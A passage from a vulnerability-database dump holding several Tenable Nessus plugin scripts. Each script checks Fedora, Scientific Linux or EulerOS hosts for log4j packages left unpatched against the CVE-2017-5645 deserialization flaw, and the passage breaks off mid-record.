"FEDORA_2017-B8358CDA24.NASL", "href": "https://www.tenable.com/plugins/nessus/101708", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-b8358cda24.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101708);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-5645\");\n script_xref(name:\"FEDORA\", value:\"2017-b8358cda24\");\n\n script_name(english:\"Fedora 26 : log4j12 (2017-b8358cda24)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-b8358cda24\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected log4j12 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:log4j12\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"log4j12-1.2.17-19.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j12\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:36", "description": "Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-05-05T00:00:00", "type": "nessus", "title": "Fedora 24 : log4j (2017-2ccfbd650a)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:log4j", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-2CCFBD650A.NASL", "href": "https://www.tenable.com/plugins/nessus/99988", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-2ccfbd650a.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99988);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-5645\");\n script_xref(name:\"FEDORA\", value:\"2017-2ccfbd650a\");\n\n script_name(english:\"Fedora 24 : log4j (2017-2ccfbd650a)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-2ccfbd650a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected log4j package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"log4j-2.5-3.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:16:35", "description": "Security Fix(es) :\n\n - It was found that when using remote logging with log4j socket server the log4j server would deserialize any log event received via TCP or UDP. An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application. (CVE-2017-5645)", "cvss3": {}, "published": "2017-08-22T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : log4j on SL7.x (noarch) (20170807)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:log4j", "p-cpe:/a:fermilab:scientific_linux:log4j-javadoc", "p-cpe:/a:fermilab:scientific_linux:log4j-manual", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20170807_LOG4J_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/102666", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102666);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-5645\");\n\n script_name(english:\"Scientific Linux Security Update : log4j on SL7.x (noarch) (20170807)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - It was found that when using remote logging with log4j\n socket server the log4j server would deserialize any log\n event received via TCP or UDP. An attacker could use\n this flaw to send a specially crafted log event that,\n during deserialization, would execute arbitrary code in\n the context of the logger application. (CVE-2017-5645)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1708&L=scientific-linux-errata&F=&S=&P=5404\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?20734978\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected log4j, log4j-javadoc and / or log4j-manual\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:log4j-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:log4j-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", reference:\"log4j-1.2.17-16.el7_4\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"log4j-javadoc-1.2.17-16.el7_4\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"log4j-manual-1.2.17-16.el7_4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j / log4j-javadoc / log4j-manual\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:24", "description": "Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-13T00:00:00", "type": "nessus", "title": "Fedora 25 : log4j12 (2017-8348115acd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:log4j12", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-8348115ACD.NASL", "href": "https://www.tenable.com/plugins/nessus/100746", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-8348115acd.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100746);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-5645\");\n script_xref(name:\"FEDORA\", value:\"2017-8348115acd\");\n\n script_name(english:\"Fedora 25 : log4j12 (2017-8348115acd)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-8348115acd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected log4j12 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:log4j12\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"log4j12-1.2.17-19.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j12\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:12:44", "description": "Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-05-03T00:00:00", "type": "nessus", "title": "Fedora 25 : log4j (2017-511ebfa8a3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:log4j", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-511EBFA8A3.NASL", "href": "https://www.tenable.com/plugins/nessus/99955", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-511ebfa8a3.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99955);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-5645\");\n script_xref(name:\"FEDORA\", value:\"2017-511ebfa8a3\");\n\n script_name(english:\"Fedora 25 : log4j (2017-511ebfa8a3)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-511ebfa8a3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected log4j package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"log4j-2.5-5.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:50", "description": "Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-17T00:00:00", "type": "nessus", "title": "Fedora 26 : log4j (2017-11edc0d6c3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:log4j", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-11EDC0D6C3.NASL", "href": "https://www.tenable.com/plugins/nessus/101576", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-11edc0d6c3.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101576);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-5645\");\n script_xref(name:\"FEDORA\", value:\"2017-11edc0d6c3\");\n\n script_name(english:\"Fedora 26 : log4j (2017-11edc0d6c3)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-11edc0d6c3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected log4j package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"log4j-2.7-4.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:03", "description": "According to the version of the log4j package installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - It was found that when using remote logging with log4j socket server the log4j server would deserialize any log event received via TCP or UDP. An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application.\n (CVE-2017-5645)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-09-11T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP2 : log4j (EulerOS-SA-2017-1214)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:log4j", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1214.NASL", "href": "https://www.tenable.com/plugins/nessus/103072", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103072);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n 